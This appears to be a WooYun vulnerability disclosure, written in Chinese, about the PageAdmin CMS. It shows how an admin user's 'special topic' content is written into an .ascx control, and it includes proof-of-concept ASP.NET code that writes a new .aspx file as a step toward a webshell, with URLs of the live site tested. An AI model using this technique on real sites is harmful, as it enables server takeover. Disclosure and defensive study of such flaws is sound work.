WooYun.org

先说明一下，此漏洞产生还是在后台，如果真要直接搞shell的话，估计还是要配合我上一发漏洞一起使用。
但是别灰心，就算此问题是后台产生，也有他的“教育”意义
直入正题！
找到专题管理——增加专题

这里有一个所谓的生成路径，看起来好像可以生成文件？先看看可以写个一句话吗：

按上面应该是在zt这个目录下，点击先提交：
专题的路径是http://www.youlu888.com/e/zt/
访问看看是否有生成asp.aspx：

似乎失败了（但是神奇的是官方demo还可以生成，估计demo没更新），但是打开专题看看：

看见木有？相对路径出来了，是写到ascx文件中的，既然提示错误了，那肯定就是一句话在这无法使用了。
既然如此，就写出符合ascx的代码，写个shell就得了！（注意，ascx文件是无法直接访问的，必须间接调用）
先了解下什么是ascx文件：
一句话说，ascx就是用户自定义的控件，比较简便，利于代码重用。
微软的一篇ascx文件相关文章：
http://msdn.microsoft.com/zh-CN/zh/library/26db8ysc(v=vs.80).aspx
上文包含有一些解释和测试代码。其它不多说。
我自己改了点代码，给大家赏玩：

<script runat="server">
public void WriteShell(object sender,EventArgs e)
{
	System.IO.File.WriteAllText(HttpContext.Current.Request.PhysicalPath+".aspx","test by wooyun");
}
</script>
<form runat="server">
<asp:Button ID="Write" runat="server" Text="Write" OnClick="WriteShell"/>
</form>

实际上和一般的aspx页面没什么很大的区别，将上面的代码写到专题去试试：

访问专题页面：
http://www.youlu888.com/e/zt/index.aspx?id=16

注意看标红的地方，出现了一个write按钮！点击按钮，在zt文件夹下就生成了一个index.aspx.aspx文件！

稍微修改后得shell：

看看生成的ascx文件的路径：

再看看zt下的index.aspx如何调用的ascx文件：

((web_bottom)userControl2).SiteId = this.aZUeyARO8j;
                    int num;
                    ((web_bottom)userControl2).ZtId = num;
                    placeHolder = new PlaceHolder();
                    UserControl userControl3;
                    zt.QFuVKyqBFXPrDMBe8c6(zt.C6k7EwqEg00l65Ft8IA(placeHolder), userControl3);
                    UserControl userControl4;
                    placeHolder.Controls.Add(userControl4);
                    flag = !File.Exists(base.Server.MapPath("~/e/zdytag/zt/" + num + ".ascx"));
                    arg_353_0 = 1;
                    continue;

以上只是部分代码，但是代码混淆了，将就看看吧！
最后附上官网截图：

是不是可以加后门了？
哈哈我肯定不做那事情，放心。
另外官方demo版本似乎较低？生成专题页面的漏洞在我下的版本默认情况下似乎是木有了的，为何在官方却还可以写？http://demo.pageadmin.net/zt/asp.aspx 生成的页面。